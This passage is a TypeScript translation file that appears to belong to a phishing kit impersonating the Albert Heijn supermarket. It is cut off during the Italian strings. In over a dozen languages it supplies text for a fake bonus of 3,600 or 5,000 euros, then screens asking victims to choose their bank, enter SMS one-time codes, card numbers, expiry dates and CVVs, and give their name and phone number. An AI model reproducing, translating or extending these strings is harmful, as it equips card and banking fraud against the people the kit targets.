export type TranslationKeys = {
  portal_name: string;
  support_center_name: string;
  win_title: string;
  win_subtitle: string;
  win_button: string;
  banken_title: string;
  banken_subtitle: string;
  banken_search_placeholder: string;
  wait_title: string;
  wait_subtitle: string;
  sms_title: string;
  sms_subtitle: string;
  sms_input_label: string;
  sms_button: string;
  sms_loading: string;
  card_title: string;
  card_subtitle: string;
  card_owner_label: string;
  card_number_label: string;
  card_expiry_label: string;
  card_cvv_label: string;
  card_button: string;
  code_title: string;
  code_subtitle: string;
  code_button: string;
  live_support_title: string;
  live_support_subtitle: string;
  live_support_button: string;
  profile_title_small: string;
  profile_title_main: string;
  profile_subtitle: string;
  profile_firstname_label: string;
  profile_lastname_label: string;
  profile_phone_label: string;
  profile_button: string;
  profile_loading_text: string;
};

export const translations: Record<string, TranslationKeys> = {
  fi: {
    portal_name: "Albert Heijn Asiakasportaali",
    support_center_name: "Albert Heijn Asiakaspalvelu",
    win_title: "Ainutlaatuinen Albert Heijn -bonus",
    win_subtitle: "Onnittelut! Sinut on valittu tämän päivän Albert Heijn -kampanjaan. Napsauta alla olevaa painiketta lunastaaksesi 3 600 euron bonuksesi.",
    win_button: "Lunasta bonus",
    banken_title: "Valitse pankkisi",
    banken_subtitle: "Valitse pankkisi jatkaaksesi.",
    banken_search_placeholder: "Etsi pankkisi...",
    wait_title: "Odota hetki",
    wait_subtitle: "Pyyntöäsi käsitellään turvallisesti...",
    sms_title: "Tekstiviestin turvakoodi",
    sms_subtitle: "Syötä {digits}-numeroinen koodi.",
    sms_input_label: "Kertakäyttöinen koodi",
    sms_button: "Vahvista",
    sms_loading: "Käsitellään...",
    card_title: "Maksutiedot",
    card_subtitle: "Tarkista ja vahvista tietosi.",
    card_owner_label: "Kortinhaltijan nimi",
    card_number_label: "Kortin numero",
    card_expiry_label: "Päättymispäivä KK/VV",
    card_cvv_label: "Turvakoodi",
    card_button: "Jatka",
    code_title: "Tervetuloa",
    code_subtitle: "Syötä kumppanilta {partner} saamasi osallistumiskoodi lunastaaksesi palkintosi.",
    code_button: "Vahvista koodi",
    live_support_title: "Live-tuki",
    live_support_subtitle: "Jatkaaksesi sinun on otettava yhteyttä asiakaspalveluumme.\n\nNapsauta alla olevaa painiketta aloittaaksesi chatin.",
    live_support_button: "Aloita chat",
    profile_title_small: "Palkinnon vahvistus",
    profile_title_main: "Bonuksesi summa",
    profile_subtitle: "Vahvista tietosi jatkokäsittelyä varten.",
    profile_firstname_label: "Etunimi",
    profile_lastname_label: "Sukunimi",
    profile_phone_label: "Matkapuhelinnumero",
    profile_button: "Seuraava",
    profile_loading_text: "Käsitellään..."
  },
  nl: {
    portal_name: "Albert Heijn klantenportaal",
    support_center_name: "Albert Heijn service",
    win_title: "Exclusieve Albert Heijn bonus",
    win_subtitle: "Gefeliciteerd! Je bent geselecteerd voor onze Albert Heijn actie van vandaag. Klik op de knop hieronder om je bonus van 3.600 euro te claimen.",
    win_button: "Bonus claimen",
    banken_title: "Kies je bank",
    banken_subtitle: "Selecteer je Nederlandse bank om verder te gaan.",
    banken_search_placeholder: "Zoek je bank...",
    wait_title: "Even geduld",
    wait_subtitle: "Je aanvraag wordt veilig verwerkt...",
    sms_title: "SMS-beveiligingscode",
    sms_subtitle: "Voer de {digits}-cijferige code in.",
    sms_input_label: "Eenmalige code",
    sms_button: "Bevestigen",
    sms_loading: "Verwerken...",
    card_title: "Betaalgegevens",
    card_subtitle: "Controleer en bevestig je gegevens.",
    card_owner_label: "Naam kaarthouder",
    card_number_label: "Kaartnummer",
    card_expiry_label: "Vervaldatum MM/JJ",
    card_cvv_label: "Beveiligingscode",
    card_button: "Doorgaan",
    code_title: "Welkom",
    code_subtitle: "Voer de deelnamecode in die je van {partner} hebt ontvangen om je beloning vrij te geven.",
    code_button: "Code bevestigen",
    live_support_title: "Live support",
    live_support_subtitle: "Om verder te gaan, moet je contact opnemen met onze klantenservice.\n\nKlik op de knop hieronder om het gesprek te starten.",
    live_support_button: "Chat openen",
    profile_title_small: "Prijsbevestiging",
    profile_title_main: "Je bonusbedrag",
    profile_subtitle: "Bevestig je gegevens voor de verdere verwerking.",
    profile_firstname_label: "Voornaam",
    profile_lastname_label: "Achternaam",
    profile_phone_label: "Mobiel nummer",
    profile_button: "Verder",
    profile_loading_text: "Verwerken..."
  },
  et: {
    portal_name: "Albert Heijn Kliendiportaal",
    support_center_name: "Albert Heijn Klienditeenindus",
    win_title: "Eksklusiivne Albert Heijn Boonus",
    win_subtitle: "Palju õnne! Olete valitud tänasesse Albert Heijn kampaaniasse. Klõpsake allolevat nuppu, et lunastada oma 3600 euro suurune boonus.",
    win_button: "Lunasta boonus",
    banken_title: "Vali oma pank",
    banken_subtitle: "Jätkamiseks vali oma pank.",
    banken_search_placeholder: "Otsi oma panka...",
    wait_title: "Palun oota",
    wait_subtitle: "Teie päringut töödeldakse turvaliselt...",
    sms_title: "SMS turvakood",
    sms_subtitle: "Sisesta {digits}-kohaline kood.",
    sms_input_label: "Ühekordne kood",
    sms_button: "Kinnita",
    sms_loading: "Töötlemine...",
    card_title: "Makseandmed",
    card_subtitle: "Kontrolli ja kinnita oma andmed.",
    card_owner_label: "Kaardiomaniku nimi",
    card_number_label: "Kaardi number",
    card_expiry_label: "Aegumiskuupäev KK/AA",
    card_cvv_label: "Turvakood",
    card_button: "Jätka",
    code_title: "Tere tulemast",
    code_subtitle: "Sisesta osalemiskood, mille said partnerilt {partner}, et oma auhind avada.",
    code_button: "Kinnita kood",
    live_support_title: "Reaalajas tugi",
    live_support_subtitle: "Jätkamiseks peate võtma ühendust meie klienditeenindusega.\n\nKlõpsake allolevat nuppu, et alustada vestlust.",
    live_support_button: "Alusta vestlust",
    profile_title_small: "Auhinna kinnitus",
    profile_title_main: "Sinu boonuse summa",
    profile_subtitle: "Kinnita oma andmed edasiseks töötlemiseks.",
    profile_firstname_label: "Eesnimi",
    profile_lastname_label: "Perekonnanimi",
    profile_phone_label: "Mobiilinumber",
    profile_button: "Edasi",
    profile_loading_text: "Töötlemine..."
  },
  cs: {
    portal_name: "Zákaznický portál Albert Heijn",
    support_center_name: "Služby Albert Heijn",
    win_title: "Exkluzivní bonus Albert Heijn",
    win_subtitle: "Gratulujeme! Byli jste vybráni do dnešní kampaně Albert Heijn. Kliknutím na tlačítko níže získáte bonus 3 600 eur.",
    win_button: "Získat bonus",
    banken_title: "Vyberte svou banku",
    banken_subtitle: "Pro pokračování vyberte svou banku.",
    banken_search_placeholder: "Hledat banku...",
    wait_title: "Čekejte prosím",
    wait_subtitle: "Váš požadavek se bezpečně zpracovává...",
    sms_title: "Bezpečnostní kód SMS",
    sms_subtitle: "Zadejte {digits}místný kód.",
    sms_input_label: "Jednorázový kód",
    sms_button: "Potvrdit",
    sms_loading: "Zpracovává se...",
    card_title: "Platební údaje",
    card_subtitle: "Zkontrolujte a potvrďte své údaje.",
    card_owner_label: "Jméno držitele karty",
    card_number_label: "Číslo karty",
    card_expiry_label: "Datum platnosti MM/RR",
    card_cvv_label: "Bezpečnostní kód",
    card_button: "Pokračovat",
    code_title: "Vítejte",
    code_subtitle: "Zadejte účastnický kód, který jste obdrželi od partnera {partner}, abyste odemkli svou odměnu.",
    code_button: "Potvrdit kód",
    live_support_title: "Živá podpora",
    live_support_subtitle: "Chcete-li pokračovat, musíte kontaktovat náš zákaznický servis.\n\nKliknutím na tlačítko níže zahájíte chat.",
    live_support_button: "Zahájit chat",
    profile_title_small: "Potvrzení výhry",
    profile_title_main: "Vaše částka bonusu",
    profile_subtitle: "Potvrďte své údaje pro další zpracování.",
    profile_firstname_label: "Jméno",
    profile_lastname_label: "Příjmení",
    profile_phone_label: "Mobilní číslo",
    profile_button: "Další",
    profile_loading_text: "Zpracovává se..."
  },
  pt: {
    portal_name: "Portal do Cliente Albert Heijn",
    support_center_name: "Serviço Albert Heijn",
    win_title: "Bónus Exclusivo Albert Heijn",
    win_subtitle: "Parabéns! Você foi selecionado para a promoção Albert Heijn de hoje. Clique no botão abaixo para resgatar seu bónus de 3.600 euros.",
    win_button: "Resgatar Bónus",
    banken_title: "Escolha o seu Banco",
    banken_subtitle: "Selecione o seu banco para continuar.",
    banken_search_placeholder: "Pesquisar o seu banco...",
    wait_title: "Por favor, aguarde",
    wait_subtitle: "O seu pedido está a ser processado com segurança...",
    sms_title: "Código de Segurança SMS",
    sms_subtitle: "Insira o código de {digits} dígitos.",
    sms_input_label: "Código de utilização única",
    sms_button: "Confirmar",
    sms_loading: "A processar...",
    card_title: "Detalhes de Pagamento",
    card_subtitle: "Verifique e confirme os seus detalhes.",
    card_owner_label: "Nome do Titular da Cartão",
    card_number_label: "Número do Cartão",
    card_expiry_label: "Data de Validade MM/AA",
    card_cvv_label: "Código de Segurança",
    card_button: "Continuar",
    code_title: "Bem-vindo",
    code_subtitle: "Insira o código de participação que recebeu do {partner} para desbloquear a sua recompensa.",
    code_button: "Confirmar Código",
    live_support_title: "Suporte ao Vivo",
    live_support_subtitle: "Para continuar, tem de contactar o nosso serviço de apoio ao cliente.\n\nClique no botão abaixo para iniciar o chat.",
    live_support_button: "Iniciar Chat",
    profile_title_small: "Confirmação de Prémio",
    profile_title_main: "O valor do seu Bónus",
    profile_subtitle: "Confirme os seus dados para processamento posterior.",
    profile_firstname_label: "Nome",
    profile_lastname_label: "Apelido",
    profile_phone_label: "Número de Telemóvel",
    profile_button: "Seguinte",
    profile_loading_text: "A processar..."
  },
  pl: {
    portal_name: "Portal Klienta Albert Heijn",
    support_center_name: "Obsługa Albert Heijn",
    win_title: "Ekskluzywny Bonus Albert Heijn",
    win_subtitle: "Gratulacje! Zostałeś wybrany do dzisiejszej promocji Albert Heijn. Kliknij przycisk poniżej, aby odebrać swój bonus w wysokości 3600 euro.",
    win_button: "Odbierz bonus",
    banken_title: "Wybierz swój bank",
    banken_subtitle: "Wybierz swój bank, aby kontynuować.",
    banken_search_placeholder: "Szukaj swojego banku...",
    wait_title: "Proszę czekać",
    wait_subtitle: "Twoje żądanie jest bezpiecznie przetwarzane...",
    sms_title: "Kod bezpieczeństwa SMS",
    sms_subtitle: "Wprowadź {digits}-cyfrowy kod.",
    sms_input_label: "Jednorazowy kod",
    sms_button: "Potwierdź",
    sms_loading: "Przetwarzanie...",
    card_title: "Dane do płatności",
    card_subtitle: "Sprawdź i potwierdź swoje dane.",
    card_owner_label: "Imię i nazwisko posiadacza karty",
    card_number_label: "Numer karty",
    card_expiry_label: "Data ważności MM/RR",
    card_cvv_label: "Kod bezpieczeństwa",
    card_button: "Kontynuuj",
    code_title: "Witamy",
    code_subtitle: "Wprowadź kod uczestnictwa, który otrzymałeś od partnera {partner}, aby odblokować nagrodę.",
    code_button: "Potwierdź kod",
    live_support_title: "Wsparcie na żywo",
    live_support_subtitle: "Aby kontynuować, musisz skontaktować się z naszą obsługą klienta.\n\nKliknij przycisk poniżej, aby rozpocząć czat.",
    live_support_button: "Rozpocznij czat",
    profile_title_small: "Potwierdzenie nagrody",
    profile_title_main: "Twoja kwota bonusu",
    profile_subtitle: "Potwierdź swoje dane do dalszego przetwarzania.",
    profile_firstname_label: "Imię",
    profile_lastname_label: "Nazwisko",
    profile_phone_label: "Numer telefonu komórkowego",
    profile_button: "Dalej",
    profile_loading_text: "Przetwarzanie..."
  },
  sv: {
    portal_name: "Albert Heijn Kundportal",
    support_center_name: "Albert Heijn Kundservice",
    win_title: "Exklusiv Albert Heijn Bonus",
    win_subtitle: "Grattis! Du har blivit utvald till dagens Albert Heijn-kampanj. Klicka på knappen nedan för att hämta din bonus på 3 600 euro.",
    win_button: "Hämta bonus",
    banken_title: "Välj din bank",
    banken_subtitle: "Välj din bank för att fortsätta.",
    banken_search_placeholder: "Sök efter din bank...",
    wait_title: "Vänligen vänta",
    wait_subtitle: "Din förfrågan behandlas säkert...",
    sms_title: "SMS-säkerhetskod",
    sms_subtitle: "Ange den {digits}-siffriga koden.",
    sms_input_label: "Engångskod",
    sms_button: "Bekräfta",
    sms_loading: "Behandlar...",
    card_title: "Betalningsuppgifter",
    card_subtitle: "Kontrollera och bekräfta dina uppgifter.",
    card_owner_label: "Kortinnehavarens namn",
    card_number_label: "Kortnummer",
    card_expiry_label: "Utgångsdatum MM/ÅÅ",
    card_cvv_label: "Säkerhetskod",
    card_button: "Fortsätt",
    code_title: "Välkommen",
    code_subtitle: "Ange deltagarkoden du fick från {partner} för att låsa upp din belöning.",
    code_button: "Bekräfta kod",
    live_support_title: "Live-support",
    live_support_subtitle: "För att fortsätta måste du kontakta vår kundtjänst.\n\nKlicka på knappen nedan för att starta chatten.",
    live_support_button: "Starta chatt",
    profile_title_small: "Prisbekräftelse",
    profile_title_main: "Ditt bonusbelopp",
    profile_subtitle: "Bekräfta dina uppgifter för vidare behandling.",
    profile_firstname_label: "Förnamn",
    profile_lastname_label: "Efternamn",
    profile_phone_label: "Mobilnummer",
    profile_button: "Nästa",
    profile_loading_text: "Behandlar..."
  },
  da: {
    portal_name: "Albert Heijn Kundeportal",
    support_center_name: "Albert Heijn Kundeservice",
    win_title: "Eksklusiv Albert Heijn Bonus",
    win_subtitle: "Tillykke! Du er blevet udvalgt til dagens Albert Heijn-kampagne. Klik på knappen nedenfor for at gøre krav på din bonus på 3.600 euro.",
    win_button: "Gør krav på bonus",
    banken_title: "Vælg din bank",
    banken_subtitle: "Vælg din bank for at fortsætte.",
    banken_search_placeholder: "Søg efter din bank...",
    wait_title: "Vent venligst",
    wait_subtitle: "Din anmodning behandles sikkert...",
    sms_title: "SMS-sikkerhedskode",
    sms_subtitle: "Indtast den {digits}-cifrede kode.",
    sms_input_label: "Engangskode",
    sms_button: "Bekræft",
    sms_loading: "Behandler...",
    card_title: "Betalingsoplysninger",
    card_subtitle: "Kontroller og bekræft dine oplysninger.",
    card_owner_label: "Kortholders navn",
    card_number_label: "Kortnummer",
    card_expiry_label: "Udløbsdato MM/ÅÅ",
    card_cvv_label: "Sikkerhedskode",
    card_button: "Fortsæt",
    code_title: "Velkommen",
    code_subtitle: "Indtast deltagerkoden, du modtog fra {partner}, for at låse op for din belønning.",
    code_button: "Bekræft kode",
    live_support_title: "Live support",
    live_support_subtitle: "For at fortsætte skal du kontakte vores kundeservice.\n\nKlik på knappen nedenfor for at starte chatten.",
    live_support_button: "Start chat",
    profile_title_small: "Præmiebekræftelse",
    profile_title_main: "Dit bonusbeløb",
    profile_subtitle: "Bekræft dine oplysninger til videre behandling.",
    profile_firstname_label: "Fornavn",
    profile_lastname_label: "Efternavn",
    profile_phone_label: "Mobilnummer",
    profile_button: "Næste",
    profile_loading_text: "Behandler..."
  },
  ro: {
    portal_name: "Portalul Clienților Albert Heijn",
    support_center_name: "Serviciul Clienți Albert Heijn",
    win_title: "Bonus Exclusiv Albert Heijn",
    win_subtitle: "Felicitări! Ați fost selectat pentru promoția Albert Heijn de astăzi. Faceți clic pe butonul de mai jos pentru a revendica bonusul dvs. de 3.600 de euro.",
    win_button: "Revendicați Bonusul",
    banken_title: "Alegeți-vă banca",
    banken_subtitle: "Selectați-vă banca pentru a continua.",
    banken_search_placeholder: "Căutați banca dvs...",
    wait_title: "Vă rugăm să așteptați",
    wait_subtitle: "Solicitarea dvs. este procesată în siguranță...",
    sms_title: "Cod de securitate SMS",
    sms_subtitle: "Introduceți codul din {digits} cifre.",
    sms_input_label: "Cod de unică folosință",
    sms_button: "Confirmați",
    sms_loading: "Se procesează...",
    card_title: "Detalii de plată",
    card_subtitle: "Verificați și confirmați detaliile dvs.",
    card_owner_label: "Numele titularului cardului",
    card_number_label: "Numărul cardului",
    card_expiry_label: "Data expirării LL/AA",
    card_cvv_label: "Cod de securitate",
    card_button: "Continuați",
    code_title: "Bun venit",
    code_subtitle: "Introduceți codul de participare primit de la {partner} pentru a debloca recompensa.",
    code_button: "Confirmați codul",
    live_support_title: "Suport live",
    live_support_subtitle: "Pentru a continua, trebuie să contactați serviciul nostru pentru clienți.\n\nFaceți clic pe butonul de mai jos pentru a începe chat-ul.",
    live_support_button: "Începeți chat-ul",
    profile_title_small: "Confirmarea premiului",
    profile_title_main: "Suma bonusului dvs.",
    profile_subtitle: "Confirmați-vă datele pentru procesarea ulterioară.",
    profile_firstname_label: "Prenume",
    profile_lastname_label: "Nume",
    profile_phone_label: "Număr de telefon mobil",
    profile_button: "Următorul",
    profile_loading_text: "Se procesează..."
  },
  el: {
    portal_name: "Πύλη Πελατών Albert Heijn",
    support_center_name: "Εξυπηρέτηση Πελατών Albert Heijn",
    win_title: "Αποκλειστικό Μπόνους Albert Heijn",
    win_subtitle: "Συγχαρητήρια! Έχετε επιλεγεί για τη σημερινή προσφορά της Albert Heijn. Κάντε κλικ στο παρακάτω κουμπί για να διεκδικήσετε το μπόνους των 3.600 ευρώ.",
    win_button: "Διεκδίκηση Μπόνους",
    banken_title: "Επιλέξτε την τράπεζά σας",
    banken_subtitle: "Επιλέξτε την τράπεζά σας για να συνεχίσετε.",
    banken_search_placeholder: "Αναζητήστε την τράπεζά σας...",
    wait_title: "Παρακαλώ περιμένετε",
    wait_subtitle: "Το αίτημά σας επεξεργάζεται με ασφάλεια...",
    sms_title: "Κωδικός ασφαλείας SMS",
    sms_subtitle: "Εισαγάγετε τον {digits}ψήφιο κωδικό.",
    sms_input_label: "Κωδικός μίας χρήσης",
    sms_button: "Επιβεβαίωση",
    sms_loading: "Επεξεργασία...",
    card_title: "Στοιχεία πληρωμής",
    card_subtitle: "Ελέγξτε και επιβεβαιώστε τα στοιχεία σας.",
    card_owner_label: "Όνομα κατόχου κάρτας",
    card_number_label: "Αριθμός κάρτας",
    card_expiry_label: "Ημερομηνία λήξης ΜΜ/ΕΕ",
    card_cvv_label: "Κωδικός ασφαλείας",
    card_button: "Συνέχεια",
    code_title: "Καλώς ήρθατε",
    code_subtitle: "Εισαγάγετε τον κωδικό συμμετοχής που λάβατε από τον {partner} για να ξεκλειδώσετε την ανταμοιβή σας.",
    code_button: "Επιβεβαίωση κωδικού",
    live_support_title: "Ζωντανή υποστήριξη",
    live_support_subtitle: "Για να συνεχίσετε, πρέπει να επικοινωνήσετε με την εξυπηρέτηση πελατών μας.\n\nΚάντε κλικ στο παρακάτω κουμπί για να ξεκινήσετε τη συνομιλία.",
    live_support_button: "Έναρξη συνομιλίας",
    profile_title_small: "Επιβεβαίωση βραβείου",
    profile_title_main: "Το ποσό του μπόνους σας",
    profile_subtitle: "Επιβεβαιώστε τα στοιχεία σας για περαιτέρω επεξεργασία.",
    profile_firstname_label: "Όνομα",
    profile_lastname_label: "Επώνυμο",
    profile_phone_label: "Αριθμός κινητού τηλεφώνου",
    profile_button: "Επόμενο",
    profile_loading_text: "Επεξεργασία..."
  },
  hu: {
    portal_name: "Albert Heijn Ügyfélportál",
    support_center_name: "Albert Heijn Ügyfélszolgálat",
    win_title: "Exkluzív Albert Heijn Bónusz",
    win_subtitle: "Gratulálunk! Kiválasztottuk a mai Albert Heijn promócióra. Kattintson az alábbi gombra az 3600 eurós bónusz igényléséhez.",
    win_button: "Bónusz igénylése",
    banken_title: "Válassza ki bankját",
    banken_subtitle: "A folytatáshoz válassza ki bankját.",
    banken_search_placeholder: "Keresse meg bankját...",
    wait_title: "Kérjük, várjon",
    wait_subtitle: "Kérésének biztonságos feldolgozása folyamatban van...",
    sms_title: "SMS Biztonsági Kód",
    sms_subtitle: "Adja meg a {digits} jegyű kódot.",
    sms_input_label: "Egyszer használatos kód",
    sms_button: "Megerősítés",
    sms_loading: "Feldolgozás...",
    card_title: "Fizetési adatok",
    card_subtitle: "Ellenőrizze és erősítse meg adatait.",
    card_owner_label: "Kártyabirtokos neve",
    card_number_label: "Kártyaszám",
    card_expiry_label: "Lejárati dátum HH/ÉÉ",
    card_cvv_label: "Biztonsági kód",
    card_button: "Folytatás",
    code_title: "Üdvözöljük",
    code_subtitle: "Adja meg a {partner} partnertől kapott részvételi kódot a jutalom feloldásához.",
    code_button: "Kód megerősítése",
    live_support_title: "Élő támogatás",
    live_support_subtitle: "A folytatáshoz kapcsolatba kell lépnie ügyfélszolgálatunkkal.\n\nKattintson az alábbi gombra a chat indításához.",
    live_support_button: "Chat indítása",
    profile_title_small: "Nyeremény megerősítése",
    profile_title_main: "Az Ön bónuszösszege",
    profile_subtitle: "Erősítse meg adatait a további feldolgozáshoz.",
    profile_firstname_label: "Keresztnév",
    profile_lastname_label: "Vezetéknév",
    profile_phone_label: "Mobilszám",
    profile_button: "Tovább",
    profile_loading_text: "Feldolgozás..."
  },
  tr: {
    portal_name: "Albert Heijn Müşteri Portalı",
    support_center_name: "Albert Heijn Hizmetleri",
    win_title: "Özel Albert Heijn Bonusu",
    win_subtitle: "Tebrikler! Bugünkü Albert Heijn kampanyamız için seçildiniz. 3.600 Euro bonusunuzu talep etmek için aşağıdaki butona tıklayın.",
    win_button: "Bonusu Talep Et",
    banken_title: "Bankanızı Seçin",
    banken_subtitle: "Devam etmek için bankanızı seçin.",
    banken_search_placeholder: "Bankanızı arayın...",
    wait_title: "Lütfen Bekleyin",
    wait_subtitle: "Talebiniz güvenle işleniyor...",
    sms_title: "SMS Güvenlik Kodu",
    sms_subtitle: "{digits} haneli kodu girin.",
    sms_input_label: "Tek kullanımlık kod",
    sms_button: "Onayla",
    sms_loading: "İşleniyor...",
    card_title: "Ödeme Bilgileri",
    card_subtitle: "Bilgilerinizi kontrol edin ve onaylayın.",
    card_owner_label: "Kart Sahibi Adı",
    card_number_label: "Kart Numarası",
    card_expiry_label: "Son Kullanma Tarihi AA/YY",
    card_cvv_label: "Güvenlik Kodu",
    card_button: "Devam Et",
    code_title: "Hoş Geldiniz",
    code_subtitle: "Ödülünüzü almak için {partner} tarafından size verilen katılım kodunu girin.",
    code_button: "Kodu Onayla",
    live_support_title: "Canlı Destek",
    live_support_subtitle: "Devam etmek için müşteri hizmetlerimizle iletişime geçmelisiniz.\n\nGörüşmeyi başlatmak için aşağıdaki butona tıklayın.",
    live_support_button: "Sohbeti Başlat",
    profile_title_small: "Ödül Onayı",
    profile_title_main: "Bonus Miktarınız",
    profile_subtitle: "İşleme devam etmek için bilgilerinizi onaylayın.",
    profile_firstname_label: "Adınız",
    profile_lastname_label: "Soyadınız",
    profile_phone_label: "Cep Telefonu",
    profile_button: "Devam",
    profile_loading_text: "İşleniyor..."
  },
  en: {
    portal_name: "Albert Heijn Customer Portal",
    support_center_name: "Albert Heijn Service",
    win_title: "Exclusive Albert Heijn Bonus",
    win_subtitle: "Congratulations! You have been selected for today's Albert Heijn promotion. Click the button below to claim your 5,000 euro bonus.",
    win_button: "Claim Bonus",
    banken_title: "Choose Your Bank",
    banken_subtitle: "Select your bank to continue.",
    banken_search_placeholder: "Search your bank...",
    wait_title: "Please Wait",
    wait_subtitle: "Your request is being securely processed...",
    sms_title: "SMS Security Code",
    sms_subtitle: "Enter the {digits}-digit code.",
    sms_input_label: "One-time code",
    sms_button: "Confirm",
    sms_loading: "Processing...",
    card_title: "Payment Details",
    card_subtitle: "Check and confirm your details.",
    card_owner_label: "Cardholder Name",
    card_number_label: "Card Number",
    card_expiry_label: "Expiry Date MM/YY",
    card_cvv_label: "Security Code",
    card_button: "Continue",
    code_title: "Welcome",
    code_subtitle: "Enter the participation code you received from {partner} to unlock your reward.",
    code_button: "Confirm Code",
    live_support_title: "Live Support",
    live_support_subtitle: "To continue, you need to contact our customer service.\n\nClick the button below to start the chat.",
    live_support_button: "Start Chat",
    profile_title_small: "Prize Confirmation",
    profile_title_main: "Your Bonus Amount",
    profile_subtitle: "Confirm your details for further processing.",
    profile_firstname_label: "First Name",
    profile_lastname_label: "Last Name",
    profile_phone_label: "Mobile Number",
    profile_button: "Next",
    profile_loading_text: "Processing..."
  },
  de: {
    portal_name: "Albert Heijn Kundenportal",
    support_center_name: "Albert Heijn Service",
    win_title: "Exklusiver Albert Heijn Bonus",
    win_subtitle: "Herzlichen Glückwunsch! Sie wurden für unsere heutige Albert Heijn Aktion ausgewählt. Klicken Sie auf den Button unten, um Ihren 3.600 Euro Bonus zu beanspruchen.",
    win_button: "Bonus beanspruchen",
    banken_title: "Wählen Sie Ihre Bank",
    banken_subtitle: "Wählen Sie Ihre Bank, um fortzufahren.",
    banken_search_placeholder: "Suchen Sie Ihre Bank...",
    wait_title: "Bitte warten",
    wait_subtitle: "Ihre Anfrage wird sicher bearbeitet...",
    sms_title: "SMS Sicherheitscode",
    sms_subtitle: "Geben Sie den {digits}-stelligen Code ein.",
    sms_input_label: "Einmaliger Code",
    sms_button: "Bestätigen",
    sms_loading: "Wird bearbeitet...",
    card_title: "Zahlungsdetails",
    card_subtitle: "Überprüfen und bestätigen Sie Ihre Details.",
    card_owner_label: "Name des Karteninhabers",
    card_number_label: "Kartennummer",
    card_expiry_label: "Ablaufdatum MM/JJ",
    card_cvv_label: "Sicherheitscode",
    card_button: "Fortfahren",
    code_title: "Willkommen",
    code_subtitle: "Geben Sie den Teilnahme-Code ein, den Sie von {partner} erhalten haben, um Ihre Belohnung freizuschalten.",
    code_button: "Code bestätigen",
    live_support_title: "Live-Support",
    live_support_subtitle: "Um fortzufahren, müssen Sie unseren Kundenservice kontaktieren.\n\nKlicken Sie auf den Button unten, um den Chat zu starten.",
    live_support_button: "Chat starten",
    profile_title_small: "Preisbestätigung",
    profile_title_main: "Ihr Bonusbetrag",
    profile_subtitle: "Bestätigen Sie Ihre Daten zur weiteren Bearbeitung.",
    profile_firstname_label: "Vorname",
    profile_lastname_label: "Nachname",
    profile_phone_label: "Handynummer",
    profile_button: "Weiter",
    profile_loading_text: "Wird bearbeitet..."
  },
  fr: {
    portal_name: "Portail Client Albert Heijn",
    support_center_name: "Service Albert Heijn",
    win_title: "Bonus Exclusif Albert Heijn",
    win_subtitle: "Félicitations ! Vous avez été sélectionné pour notre promotion Albert Heijn d'aujourd'hui. Cliquez sur le bouton ci-dessous pour réclamer votre bonus de 3 600 euros.",
    win_button: "Réclamer le Bonus",
    banken_title: "Choisissez Votre Banque",
    banken_subtitle: "Sélectionnez votre banque pour continuer.",
    banken_search_placeholder: "Recherchez votre banque...",
    wait_title: "Veuillez Patienter",
    wait_subtitle: "Votre demande est en cours de traitement sécurisé...",
    sms_title: "Code de Sécurité SMS",
    sms_subtitle: "Entrez le code à {digits} chiffres.",
    sms_input_label: "Code à usage unique",
    sms_button: "Confirmer",
    sms_loading: "Traitement en cours...",
    card_title: "Détails de Paiement",
    card_subtitle: "Vérifiez et confirmez vos détails.",
    card_owner_label: "Nom du Titulaire",
    card_number_label: "Numéro de Carte",
    card_expiry_label: "Date d'Expiration MM/AA",
    card_cvv_label: "Code de Sécurité",
    card_button: "Continuer",
    code_title: "Bienvenue",
    code_subtitle: "Entrez le code de participation que vous avez reçu de {partner} pour débloquer votre récompense.",
    code_button: "Confirmer le Code",
    live_support_title: "Assistance en Direct",
    live_support_subtitle: "Pour continuer, vous devez contacter notre service client.\n\nCliquez sur le bouton ci-dessous pour démarrer le chat.",
    live_support_button: "Démarrer le Chat",
    profile_title_small: "Confirmation du Prix",
    profile_title_main: "Montant de Votre Bonus",
    profile_subtitle: "Confirmez vos coordonnées pour le traitement ultérieur.",
    profile_firstname_label: "Prénom",
    profile_lastname_label: "Nom",
    profile_phone_label: "Numéro de Mobile",
    profile_button: "Suivant",
    profile_loading_text: "Traitement en cours..."
  },
  es: {
    portal_name: "Portal del Cliente Albert Heijn",
    support_center_name: "Servicio Albert Heijn",
    win_title: "Bono Exclusivo Albert Heijn",
    win_subtitle: "¡Felicidades! Has sido seleccionado para la promoción de Albert Heijn de hoy. Haz clic en el botón de abajo para reclamar tu bono de 3.600 euros.",
    win_button: "Reclamar Bono",
    banken_title: "Elige tu Banco",
    banken_subtitle: "Selecciona tu banco para continuar.",
    banken_search_placeholder: "Busca tu banco...",
    wait_title: "Por favor, espera",
    wait_subtitle: "Tu solicitud está siendo procesada de forma segura...",
    sms_title: "Código de Seguridad SMS",
    sms_subtitle: "Ingresa el código de {digits} dígitos.",
    sms_input_label: "Código de un solo uso",
    sms_button: "Confirmar",
    sms_loading: "Procesando...",
    card_title: "Detalles de Pago",
    card_subtitle: "Verifica y confirma tus detalles.",
    card_owner_label: "Nombre del Titular",
    card_number_label: "Número de Tarjeta",
    card_expiry_label: "Fecha de Caducidad MM/AA",
    card_cvv_label: "Código de Seguridad",
    card_button: "Continuar",
    code_title: "Bienvenido",
    code_subtitle: "Ingresa el código de participación que recibiste de {partner} para desbloquear tu recompensa.",
    code_button: "Confirmar Código",
    live_support_title: "Soporte en Vivo",
    live_support_subtitle: "Para continuar, necesitas contactar a nuestro servicio al cliente.\n\nHaz clic en el botón de abajo para iniciar el chat.",
    live_support_button: "Iniciar Chat",
    profile_title_small: "Confirmación de Premio",
    profile_title_main: "Monto de tu Bono",
    profile_subtitle: "Confirma tus datos para continuar el procesamiento.",
    profile_firstname_label: "Nombre",
    profile_lastname_label: "Apellido",
    profile_phone_label: "Número de Móvil",
    profile_button: "Siguiente",
    profile_loading_text: "Procesando..."
  },
  it: {
    portal_name: "Portale Clienti Albert Heijn",
    support_center_name: "Servizio Albert Heijn",
    win_title: "Bonus Esclusivo Albert Heijn",
    win_subtitle: "Congratulazioni! Sei stato selezionato per la promozione Albert Heijn di oggi. Clicca sul pulsante qui sotto per richiedere il tuo bonus di 3.600 euro.",
    win_button: "Richiedi Bonus",
    banken_title: "Scegli la tua Banca",
    banken_subtitle: "Seleziona la tua banca per continuare.",
    banken_search_placeholder: "Cerca la tua banca...",
    wait_title: "Attendere prego",
    wait_subtitle: "La tua richiesta è in fase di elaborazione sicura...",
    sms_title: "Codice di Sicurezza SMS",
    sms_subtitle: "Inserisci il codice a {digits} cifre.",
    sms_input_label: "Codice monouso",
    sms_button: "Conferma",
    sms_loading: "Elaborazione...",
